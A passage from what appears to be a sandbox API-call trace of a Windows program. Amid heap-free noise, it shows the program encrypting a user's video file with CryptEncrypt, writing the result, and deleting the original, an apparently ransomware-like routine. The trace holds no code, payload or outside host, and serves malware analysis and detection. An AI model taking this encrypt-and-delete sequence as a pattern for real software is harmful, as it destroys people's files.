hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0097.303] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0097.303] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2640, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2640*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0097.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.305] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.368] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.368] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0097.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0097.369] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0097.370] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x4bf9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x4c00) returned 1 [0097.370] CharLowerBuffW (in: lpsz="byte[19457]", cchLength=0xb | out: lpsz="byte[19457]") returned 0xb [0097.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0097.370] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4524428*, pdwDataLen=0x144e538*=0x4bf9, dwBufLen=0x4c00 | out: pbData=0x4524428*, pdwDataLen=0x144e538*=0x4c00) returned 1 [0097.371] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.371] WriteFile (in: hFile=0x298, lpBuffer=0x453c060*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x453c060*, lpNumberOfBytesWritten=0x144ef3c*=0x4c00, lpOverlapped=0x0) returned 1 [0097.373] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0097.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca448, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0097.373] CryptDestroyKey (hKey=0x41ac700) returned 1 [0097.373] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.373] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.373] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0097.374] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0097.374] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.374] FreeLibrary (hLibModule=0x756e0000) returned 1 [0097.374] CloseHandle (hObject=0x258) returned 1 [0097.374] CloseHandle (hObject=0x298) returned 1 [0097.376] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv", lpFilePart=0x0) returned 0x3c [0097.376] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\vj4prqa2pjimduescam.mkv")) returned 0x20 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.376] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83dcebb0, ftCreationTime.dwHighDateTime=0x1d5e857, ftLastAccessTime.dwLowDateTime=0xef491730, ftLastAccessTime.dwHighDateTime=0x1d5e540, ftLastWriteTime.dwLowDateTime=0xef491730, ftLastWriteTime.dwHighDateTime=0x1d5e540, nFileSizeHigh=0x0, nFileSizeLow=0x4bf9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="vJ4PRQa2pJimDueSCaM.mkv", cAlternateFileName="VJ4PRQ~1.MKV")) returned 0x41ac500 [0097.377] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\vj4prqa2pjimduescam.mkv")) returned 1 [0097.415] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83dcebb0, ftCreationTime.dwHighDateTime=0x1d5e857, ftLastAccessTime.dwLowDateTime=0xef491730, ftLastAccessTime.dwHighDateTime=0x1d5e540, ftLastWriteTime.dwLowDateTime=0xef491730, ftLastWriteTime.dwHighDateTime=0x1d5e540, nFileSizeHigh=0x0, nFileSizeLow=0x4bf9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="vJ4PRQa2pJimDueSCaM.mkv", cAlternateFileName="VJ4PRQ~1.MKV")) returned 0 [0097.415] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0097.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0097.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0097.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0097.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0097.416] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0097.416] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, 